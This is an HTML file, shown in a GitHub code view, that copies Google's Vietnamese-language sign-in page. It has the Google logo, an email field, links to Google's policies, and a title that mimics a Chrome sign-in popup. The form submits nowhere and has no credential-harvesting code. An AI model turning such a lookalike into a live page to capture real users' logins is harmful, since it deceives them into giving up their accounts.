-
Notifications
You must be signed in to change notification settings - Fork 1
/
index.html
59 lines (51 loc) · 2.52 KB
/
index.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Đăng nhập - Tài khoản Google - Google Chrome</title>
<link rel = "icon" type = "image/png" href = "./google.svg">
<link rel="stylesheet" href="./css/style.css">
</head>
<body>
<div class="main">
<div class="content">
<form action="" method="POST" class="form">
<div class="brand-label">
<img src="./google.svg" class="logo-label">
Đăng nhập bằng Google
</div>
<h3 class="heading">Đăng nhập</h3>
<p class="desc">Tiếp tục với <a href="https://gmail.google.com/">Gmail</a></p>
<div class="spacer"></div>
<div class="form-group">
<!-- <label for="email" class="form-label">Email</label> -->
<input id="email" name="email" type="email" placeholder="Email hoặc số điện thoại"
class="form-control" autofocus>
<span class="form-message"></span>
</div>
<div class="after-form left">
<a href="./forget.html" class="forget">Bạn quên địa chỉ email?</a>
<p class="privacy left">Để tiếp tục, Google sẽ chia sẻ tên, địa chỉ email, tùy chọn ngôn ngữ và
ảnh hồ sơ của bạn.
Trước khi sử dụng bạn có thể xem
<a href="https://policies.google.com/privacy">chính sách quyền riêng tư</a>
và
<a href="https://policies.google.com/terms">điều khoản dịch vụ</a> của ứng dụng này
</p>
</div>
<!-- <div class="form-group">
<label for="password" class="form-label">Mật khẩu</label>
<input id="password" name="password" type="password" placeholder="Nhập mật khẩu" class="form-control">
<span class="form-message"></span>
</div> -->
<div class="submit">
<a href="./create.html" class="create">Tạo tài khoản</a>
<button class="form-submit">Tiếp theo</button>
</div>
</form>
</div>
</div>
</body>
</html>